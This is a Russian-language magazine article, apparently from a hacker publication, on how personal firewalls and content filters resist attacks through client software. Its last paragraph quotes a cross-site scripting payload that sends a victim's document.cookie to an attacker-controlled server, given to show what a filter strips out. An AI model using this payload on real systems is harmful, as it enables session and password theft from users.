Защита снаружи и изнутри

(c)oded by Lame@pochta.ru

Спецвыпуск: Хакер, номер #048, стр. 048-096-2

Поскольку фильтрация трафика является старым и наиболее проработанным методом защиты, обойти ее «в лоб» довольно трудно. Если межсетевой экран запрещает входящие соединения, то установить соединение с сервисом на машине невозможно (если только в Bugtraq не промелькнуло что-то интересное). Поэтому чаще всего проникают на компьютеры с установленным межсетевым экраном через клиентские приложения.

Фильтрация содержимого прикладных протоколов

Если напрямую пробить персональный межсетевой экран не удалось, это делают через клиентское приложение. Основные векторы атак на клиентов - это Web, почта и дырки в головах пользователей. Причем часто эти векторы используются совместно. Например, приходит письмо, в котором под видом свежего крякера интернета лежит троян, отсылающий пароли на вражеский web-сервер. От социотехники и других методов честного обмана пользователей межсетевые экраны, конечно, не защищают.

Если внимательно проанализировать Bugtraq, то окажется, что наибольшее количество ошибок приходится именно на клиентские программы. Впереди планеты всей здесь, естественно, Internet Explorer, но и другие программы не отстают. Даже в милой сердцу любого юниксоида утилите mail в свое время были найдено переполнение буфера (www.security.nnov.ru/search/news.asp?binid=2872). Однако персональные межсетевые экраны не дремлют и в этом случае. Многие из них реализуют функцию фильтрации содержимого (content-filter), то есть умеют работать на прикладном уровне протокола TCP/IP.

Давай представим следующую ситуацию. У тебя стоит почтовый content-filter, настроенный на фильтрацию по ключевым словам. Вдруг приходит почтовое сообщение, содержащее архив ZIP, в котором есть документ Word, в который вставлена таблица Excel, в одном из столбцов которого содержатся нехорошие слова, предположим, «Mega Secret Data». Content-filter соберет из отдельных пакетов все почтовое сообщение, найдет в нем архив, развернет его, просмотрит все объекты в документе Word, обнаружит таблицу Excel и нехорошие слова в ней, после чего заблокирует данное сообщение.

Кроме того, эти фильтры могут отсекать компоненты ActiveX, скрипты JavaScript и VBScript, почтовые вложения с расширениями exe и src. Находит хакер на сервере www.pochta-mail.org уязвимость типа Cross-Site-Scripting и начинает пробамбливать клиентов этого сервера почтовыми сообщениями, тихонько уводящими их пароли. Но вожделенный location.href=”myserver.com&”+document.cookie почему-то не отрабатывает на их машинах. В этом может быть виноват персональный МСЭ, обрезающий потенциально небезопасное содержимое – сценарии.